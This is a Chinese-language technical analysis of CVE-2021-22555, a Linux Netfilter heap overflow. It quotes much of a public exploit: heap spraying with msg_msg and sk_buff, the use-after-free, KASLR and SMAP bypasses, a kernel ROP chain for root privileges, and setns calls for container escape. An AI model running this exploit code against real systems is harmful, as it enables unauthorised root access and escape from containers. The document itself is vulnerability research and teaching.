CVE-2021-22555漏洞分析

作者：moxingyuan@iceswordlab

一、漏洞背景

CVE-2021-22555是一个存在了15年之久的内核堆溢出漏洞，它位于内核的Netfilter组件中，这个组件可以被用来实现防火墙、NAT等功能。

该漏洞在2006年由commit 9fa492cdc160cd27ce1046cb36f47d3b2b1efa21引入，并在2021年由commit b29c457a6511435960115c0f548c4360d5f4801d修复。

利用这个漏洞可以导致目标系统拒绝服务，甚至实现提权、容器逃逸并执行任意代码，危害等级极高。

二、漏洞分析

漏洞位于net/netfilter/x_tables.c的xt_compat_target_from_user函数：

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
                unsigned int *size)
{
    const struct xt_target *target = t->u.kernel.target;
    struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
    int pad, off = xt_compat_target_offset(target);
    u_int16_t tsize = ct->u.user.target_size;
    char name[sizeof(t->u.user.name)];

    t = *dstptr;
    memcpy(t, ct, sizeof(*ct));
    if (target->compat_from_user)
        target->compat_from_user(t->data, ct->data);
    else
        memcpy(t->data, ct->data, tsize - sizeof(*ct));
    pad = XT_ALIGN(target->targetsize) - target->targetsize;
    if (pad > 0)
        memset(t->data + target->targetsize, 0, pad);

    tsize += off;
    t->u.user.target_size = tsize;
    strlcpy(name, target->name, sizeof(name));
    module_put(target->me);
    strncpy(t->u.user.name, name, sizeof(t->u.user.name));

    *size += off;
    *dstptr += tsize;
}

缓冲区溢出发生在memset(t->data + target->targetsize, 0, pad)这个语句，其本意是讲已经对齐的缓冲区多余的pad个字节清零。由于在分配内存的时候没有考虑到对齐，t->data之后只有target->targetsize个字节的有效存储空间，导致这里会发生pad个字节的溢出。通过选择不同的target，可以控制targetsize，进而控制溢出字节数pad。

要让内核执行到有漏洞的xt_compat_target_from_user函数，需要在用户空间调用setsockopt，并提供IPT_SO_SET_REPLACE或IP6T_SO_SET_REPLACE作为第3个参数。这个操作需要用户进程拥有CAP_NET_ADMIN能力，而这个能力可以通过切换到新的用户+网络名称空间来获得。

三、EXP分析

EXP下载地址

EXP整体思路是利用堆溢出改写特殊链表的指针，进而实现UAF，最后改写特定内核结构体的函数指针来实现代码执行。

3.1 实现UAF

3.1.1 申请消息队列

通过msgget申请NUM_MSQIDS个消息队列，在EXP中NUM_MSQIDS等于4096。消息队列数目没有特殊要求，数目越多则EXP越稳定，原因后面会解释。这步是为后面的堆喷做准备。

for (int i = 0; i < NUM_MSQIDS; i++) {
  if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
    perror("[-] msgget");
    goto err_no_rmid;
  }
}

3.1.2 发送主要消息

通过msgsnd给每个消息队列都发送一个4096字节的消息，暂且称这些消息为主要消息，每个消息的内容是其所在消息队列的序号，分别为0-4095。注意这里所谓的4096字节并非指消息内容的长度，而是指消息传递到内核空间之后，内核为容纳该消息而开辟的堆缓冲区的大小，该缓冲区容纳了一个结构体msg_msg的实例和消息的实际内容，后面所提及的“消息长度”都是指内核缓冲区的长度。

printf("[*] Spraying primary messages...\n");
for (int i = 0; i < NUM_MSQIDS; i++) {
  memset(&msg_primary, 0, sizeof(msg_primary));
  *(int *)&msg_primary.mtext[0] = MSG_TAG;
  *(int *)&msg_primary.mtext[4] = i;
  if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
      0)
    goto err_rmid;
}

int write_msg(int msqid, const void *msgp, size_t msgsz, long msgtyp) {
  *(long *)msgp = msgtyp;
  if (msgsnd(msqid, msgp, msgsz - sizeof(long), 0) < 0) {
    perror("[-] msgsnd");
    return -1;
  }
  return 0;
}

这里所使用的msgsnd函数是最常用的堆喷手段之一，因为传递的消息内容会一成不变地复制到内核缓冲区中，这样就可以达到控制内核缓冲区内容的目的。当消息传递到内核空间时，内核是通过alloc_msg函数来申请堆缓冲区的：

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
static struct msg_msg *alloc_msg(size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg **pseg;
    size_t alen;

    // 取实际消息长度len和DATALEN_MSG中的最小值为第一个消息分片的长度
    alen = min(len, DATALEN_MSG);
    // 为首个消息分片开辟缓冲区，长度为结构体msg_msg加上alen
    msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
    if (msg == NULL)
        return NULL;

    msg->next = NULL;
    msg->security = NULL;

    len -= alen;
    pseg = &msg->next;
    // 若首个消息分片不足以容纳完整的消息，将陆续开辟后续的消息分片
    while (len > 0) {
        struct msg_msgseg *seg;

        cond_resched();

        alen = min(len, DATALEN_SEG);
        // 为后续消息分片开辟缓冲区，长度为结构体msg_msgseg加上alen
        seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
        if (seg == NULL)
            goto out_err;
        *pseg = seg;
        seg->next = NULL;
        pseg = &seg->next;
        len -= alen;
    }

    return msg;

out_err:
    free_msg(msg);
    return NULL;
}

其中，结构体msg_msg的定义如下：

struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;        /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

struct list_head {
    struct list_head *next, *prev;
};

内核为消息开辟好缓冲区后，会将其插入到每个消息队列中，形成一个双向链表，每个消息的m_list.next指针指向下一个消息，m_list.prev指向前一个消息。

需要注意的是，当消息实际内容的长度大于阈值DATALEN_MSG时，内核会对消息进行分片，这在利用过程中是必须要避免的，所幸的是这里选择的长度并不会导致消息分片。

发送完后，极大概率存在部分主要消息在地址上是连续的：

3.1.3 发送次要消息

再给每个消息队列发送1024个字节的次要消息，每个消息的内容同样是其所在消息队列的序号。

printf("[*] Spraying secondary messages...\n");{{
for (int i = 0; i < NUM_MSQIDS; i++) {
  memset(&msg_secondary, 0, sizeof(msg_secondary));
  *(int *)&msg_secondary.mtext[0] = MSG_TAG;
  *(int *)&msg_secondary.mtext[4] = i;
  if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
                MTYPE_SECONDARY) < 0)
    goto err_rmid;
}

发送完后，每个主要消息后面都会跟着一个次要消息，且它们的内容是相同的：

3.1.4 释放部分主要消息

从第1024号队列开始，每隔1024个队列释放一个主要消息，这一步释放的缓冲区将在后面触发漏洞时重新申请使用，将间隔设置为1024也是因为这样选出的主要消息所在的内存位置之后紧邻另一个主要消息的可能性更大。

printf("[*] Creating holes in primary messages...\n");
for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
  if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
      0)
    goto err_rmid;
}

3.1.5 触发缓冲区溢出漏洞

重新申请上一步释放的缓冲区，同时触发缓冲区溢出漏洞，将缓冲区外2个字节覆盖为0。前面提到，上一步释放的缓冲区后面极大概率紧跟着一个主要消息，这是因为前面发送了大量主要消息，将内核内存分配器能分配的内存空洞都填满了之后，所获得的缓冲区极大概率是相邻的。所以，申请的消息队列数目越多，发送越多的主要消息，内存空洞被填满的概率越大，EXP也就越稳定。在这种理想情况下，这一步会将缓冲区后面的主要消息的next指针的最低位2个字节覆盖为0，导致其指向另外一个次要消息。这样，就会有2个主要消息的next指针指向同一个次要消息。

printf("[*] Triggering out-of-bounds write...\n");
if (trigger_oob_write(s) < 0)
  goto err_rmid;

int trigger_oob_write(int s) {
  struct __attribute__((__packed__)) {
    struct ipt_replace replace;
    struct ipt_entry entry;
    struct xt_entry_match match;
    char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2];
    struct xt_entry_target target;
  } data = {0};

  data.replace.num_counters = 1;
  data.replace.num_entries = 1;
  data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                       sizeof(data.pad) + sizeof(data.target));

  data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                            sizeof(data.pad) + sizeof(data.target));
  data.entry.target_offset =
      (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad));

  data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.pad));
  strcpy(data.match.u.user.name, "icmp");
  data.match.u.user.revision = 0;

  data.target.u.user.target_size = sizeof(data.target);
  strcpy(data.target.u.user.name, "NFQUEUE");
  data.target.u.user.revision = 1;

  // Partially overwrite the adjacent buffer with 2 bytes of zero.
  if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0) {
    if (errno == ENOPROTOOPT) {
      printf("[-] Error ip_tables module is not loaded.\n");
      return -1;
    }
  }

  return 0;
}

3.1.6 实现UAF

利用带MSG_COPY参数的msgrcv函数搜索同一消息队列但内容不同的主要消息和次要消息，这样就可以在不释放消息缓冲区的前提下查看消息内容。前面提到，同一消息队列的主要消息和次要消息的内容在正常情况下应该是相同的，如果不同，说明该主要消息的next指针在上一步被改写了，导致2个消息队列包含同一个次要消息。再释放其中一个队列的次要消息，由于另一个队列还在使用该次要消息，就实现了UAF。

printf("[*] Searching for corrupted primary message...\n");
for (int i = 0; i < NUM_MSQIDS; i++) {
  if (i != 0 && (i % HOLE_STEP) == 0)
    continue;
  if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
    goto err_no_rmid;
  if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) {
    printf("[-] Error could not corrupt any primary message.\n");
    goto err_no_rmid;
  }
  if (*(int *)&msg_secondary.mtext[4] != i) {
    fake_idx = i;
    real_idx = *(int *)&msg_secondary.mtext[4];
    break;
  }
}

if (fake_idx == -1 && real_idx == -1) {
  printf("[-] Error could not corrupt any primary message.\n");
  goto err_no_rmid;
}

// fake_idx's primary message has a corrupted next pointer; wrongly
// pointing to real_idx's secondary message.
printf("[+] fake_idx: %x\n", fake_idx);
printf("[+] real_idx: %x\n", real_idx);

printf("[*] Freeing real secondary message...\n");
if (read_msg(msqid[real_idx], &msg_secondary, sizeof(msg_secondary),
              MTYPE_SECONDARY) < 0)
  goto err_rmid;

3.2 绕过SMAP

如果内核开启了SMAP，用户空间的数据将不能被内核访问，就需要通过信息泄露获取内核空间的地址来利用内核空间的数据。

3.2.1 构造伪次要消息

上一步释放了一个次要消息所占据的缓冲区，为了方便说明，后面称之为关键缓冲区。关键缓冲区虽然被释放了，但还是有一个消息队列在使用关键缓冲区。

通过write函数向UNIX socket写入数据的方式构造许多个伪次要消息，之所以要构造多个，是为了切实地将虚假数据写入已经被释放的关键缓冲区中。这也是实现堆喷的重要手段，由于没有多余的数据结构占据通过该手段写入的缓冲区，因而可以完全控制内核缓冲区的内容。

这里构造的伪次要消息的m_ts字段（表示消息内容长度的字段）为不需要分片的最大消息内容长度，要远远大于1024字节的真实次要消息内容长度，相当于将相邻的次要消息也纳入伪次要消息的范围。

// Reclaim the previously freed secondary message with a fake msg_msg of
// maximum possible size.
printf("[*] Spraying fake secondary messages...\n");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
              PAGE_SIZE - MSG_MSG_SIZE, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
  goto err_rmid;

void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next,
                   uint64_t m_list_prev, uint64_t m_ts, uint64_t next) {
  msg->m_list_next = m_list_next;
  msg->m_list_prev = m_list_prev;
  msg->m_type = MTYPE_FAKE;
  msg->m_ts = m_ts;
  msg->next = next;
  msg->security = 0;
}

int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size) {
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (write(ss[i][0], buf, size) < 0) {
        perror("[-] write");
        return -1;
      }
    }
  }
  return 0;
}

3.2.2 越界读取相邻次要消息

由于构造的伪次要消息的m_ts字段要远大于真实次要消息内容长度，通过读取该消息可以越界读取相邻次要消息的头部内容，包括next指针，这样就获得了该next指针所指向的主要消息的地址（消息队列是双向链表）。

// Use the fake secondary message to read out-of-bounds.
printf("[*] Leaking adjacent secondary message...\n");
if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
  goto err_rmid;

// Check if the leak is valid.
if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) {
  printf("[-] Error could not leak adjacent secondary message.\n");
  goto err_rmid;
}

// The secondary message contains a pointer to the primary message.
msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
kheap_addr = msg->m_list_next;
if (kheap_addr & (PRIMARY_SIZE - 1))
  kheap_addr = msg->m_list_prev;
printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);

3.2.3 再次构造伪次要消息

获得了相邻次要消息所指向的主要消息的地址后，通过read函数读取socket内容的方式释放伪次要消息，让关键缓冲区再次进入被释放状态。然后，以相同的方式重新构造伪次要消息，这次构造的m_ts字段要大于消息分片的阈值，next字段等于相邻次要消息所指向的主要消息的地址-结构msg_msgseg的长度，这样做相当于将该主要消息伪造成下一个消息片段，那么在读取伪次要消息时，就可以读取该主要消息的next指针，该指针指向相邻次要消息，将指针内容减去1024即可获得伪次要消息即关键缓冲区的地址。

// Put kheap_addr at next to leak its content. Assumes zero bytes before
// kheap_addr.
printf("[*] Spraying fake secondary messages...\n");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
              sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
  goto err_rmid;

// Use the fake secondary message to read from kheap_addr.
printf("[*] Leaking primary message...\n");
if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
  goto err_rmid;

// Check if the leak is valid.
if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) {
  printf("[-] Error could not leak primary message.\n");
  goto err_rmid;
}

// The primary message contains a pointer to the secondary message.
msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
kheap_addr = msg->m_list_next;
if (kheap_addr & (SECONDARY_SIZE - 1))
  kheap_addr = msg->m_list_prev;

// Calculate the address of the fake secondary message.
kheap_addr -= SECONDARY_SIZE;
printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);

3.3 绕过KASLR/SMEP

接下来将通过泄露内核.data段的地址来绕过KASLR，并通过利用内核gadget构造ROP链来绕过SMEP。

3.3.1 释放伪次要消息

前面构造的伪次要消息的内容是通过socket写入的，那么内核肯定有一个跟socket相关的结构体是指向伪次要消息缓冲区的，事实上该结构体为sk_buff。

由于结构体msg_msg占据了消息缓冲区前面部分，msgrcv不能完全读取缓冲区的内容，而通过socket则相反。因此，需要通过msgrcv将关键缓冲区释放，后面通过socket读取关键缓冲区的内容。

由于之前构造的伪次要消息的next和prev指针不是有效的地址，现阶段不能直接通过msgrcv释放该伪次要消息，因为内核会检查消息队列链表的完整性。

为了能通过msgrcv释放伪次要消息，需要依次执行以下步骤：

通过读取socket释放关键缓冲区。
通过写入socket再次申请关键缓冲区，写入内容为重新构造的伪次要消息，其next和prev指针为自身地址，这样就能绕过链表完整性检查。
通过msgrcv释放伪次要消息。

printf("[*] Freeing fake secondary messages...\n");
free_skbuff(ss, secondary_buf, sizeof(secondary_buf));

// Put kheap_addr at m_list_next & m_list_prev so that list_del() is possible.
printf("[*] Spraying fake secondary messages...\n");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((void *)secondary_buf, kheap_addr, kheap_addr, 0, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
  goto err_rmid;

printf("[*] Freeing sk_buff data buffer...\n");
if (read_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
  goto err_rmid;

3.3.2 泄露内核地址

上一步执行完后，还有sk_buff指向关键缓冲区，那么，如果在关键缓冲区填入包含指向内核.data段指针的数据结构，再通过读取socket来获得缓冲区的完整内容，就可以获得内核.data段的地址，进而计算出.text段的地址，让利用内核gadget成为可能。

结构体pipe_buffer是个很好的目标，其定义如下：

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    ...
    /*
     * When the contents of this pipe buffer has been completely
     * consumed by a reader, ->release() is called.
     */
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
    ...
};

pipe_buffer的成员ops指向一个位于内核.data段的数据结构anon_pipe_buf_ops，它将是接下来的泄露目标。

而且，ops指向的数据结构包含很多跟管道操作相关的函数指针，其中一个是release，它所指向的函数将在释放管道时被调用。那么，通过篡改ops指向伪造的pipe_buf_operations结构，在释放管道时就可以劫持控制流。

为泄露内核.data段的地址，将进行以下步骤：

通过向多个管道写入数据让内核构造多个pipe_buffer结构体的实例，其中一个实例将占据关键缓冲区。此时内存布局如下：

读取socket，获得anon_pipe_buf_ops的地址，也就是获得了内核.data段地址。

printf("[*] Spraying pipe_buffer objects...\n");
for (int i = 0; i < NUM_PIPEFDS; i++) {
  if (pipe(pipefd[i]) < 0) {
    perror("[-] pipe");
    goto err_rmid;
  }
  // Write something to populate pipe_buffer.
  if (write(pipefd[i][1], "pwn", 3) < 0) {
    perror("[-] write");
    goto err_rmid;
  }
}

printf("[*] Leaking and freeing pipe_buffer object...\n");
for (int i = 0; i < NUM_SOCKETS; i++) {
  for (int j = 0; j < NUM_SKBUFFS; j++) {
    if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0) {
      perror("[-] read");
      goto err_rmid;
    }
    if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
      pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
  }
}

kbase_addr = pipe_buffer_ops - ANON_PIPE_BUF_OPS;
printf("[+] anon_pipe_buf_ops: %" PRIx64 "\n", pipe_buffer_ops);
printf("[+] kbase_addr: %" PRIx64 "\n", kbase_addr);

此时关键缓冲区已被释放，内存布局如下：

3.4 提权和容器逃逸

先通过写入socket构造伪pipe_buffer，让ops指针指向在关键缓冲区伪造的pipe_buf_operations，其中的release指针指向跟栈迁移相关的内核.text段的gadget。

同时，在关键缓冲区构造ROP链依序执行以下任务：

保存RBP。
执行commit_creds(prepare_kernel_cred(NULL))，这一步是为了获得root权限。
执行switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)，这一步在容器环境中才有用，否则只是冗余步骤，作用是pid为1的进程的名称空间替换为容器初始化时的全局名称空间init_nsproxy，init_nsproxy名称空间可以访问宿主机的文件系统。
恢复RBP并恢复正常执行流程。

printf("[*] Spraying fake pipe_buffer objects...\n");
memset(secondary_buf, 0, sizeof(secondary_buf));
buf = (struct pipe_buffer *)&secondary_buf;
buf->ops = kheap_addr + 0x290;
ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
// RSI points to &buf.
ops->release = kbase_addr + PUSH_RSI_JMP_QWORD_PTR_RSI_39;
build_krop(secondary_buf, kbase_addr, kheap_addr + 0x2B0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
  goto err_rmid;

void build_krop(char *buf, uint64_t kbase_addr, uint64_t scratchpad_addr) {
  uint64_t *rop;

  *(uint64_t *)&buf[0x39] = kbase_addr + POP_RSP_RET;
  *(uint64_t *)&buf[0x00] = kbase_addr + ADD_RSP_D0_RET;

  rop = (uint64_t *)&buf[0xD8];

  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = scratchpad_addr; // R12
  *rop++ = 0xDEADBEEF;      // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBX
  *rop++ = 0xDEADBEEF; // R12
  *rop++ = 0xDEADBEEF; // RBP

  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0; // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4; // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + COMMIT_CREDS;

  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1; // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4; // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY; // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;

  // Load RBP from scratchpad_addr and resume execution.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0xA; // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_A_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
}

释放管道，执行release所指向的gadget，将内核栈迁移到关键缓冲区构造的ROP链处，然后执行完整个ROP链，实现提权。

printf("[*] Releasing pipe_buffer objects...\n");
for (int i = 0; i < NUM_PIPEFDS; i++) {
  if (close(pipefd[i][0]) < 0) {
    perror("[-] close");
    goto err_rmid;
  }
  if (close(pipefd[i][1]) < 0) {
    perror("[-] close");
    goto err_rmid;
  }
}

最后，将当前进程的名称空间替换成1号进程的，而1号进程的名称空间已经替换成容器初始化时的全局名称空间init_nsproxy，由此实现容器逃逸。

setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
setns(open("/proc/1/ns/pid", O_RDONLY), 0);
setns(open("/proc/1/ns/net", O_RDONLY), 0);

参考文献

CVE-2021-22555: Turning \x00\x00 into 10000$

CVE-2021-22555 – The MITRE Corporation

CVE-2021-22555 linux内核提权

隐藏十五年的漏洞：CVE-2021-22555 漏洞分析与复现

CVE-2021-22555 2字节堆溢出写0漏洞提权分析

namespaces(7) — Linux manual page

The Route to Root: Container Escape Using Kernel Exploitation

Linux Kernel universal heap spray

（完）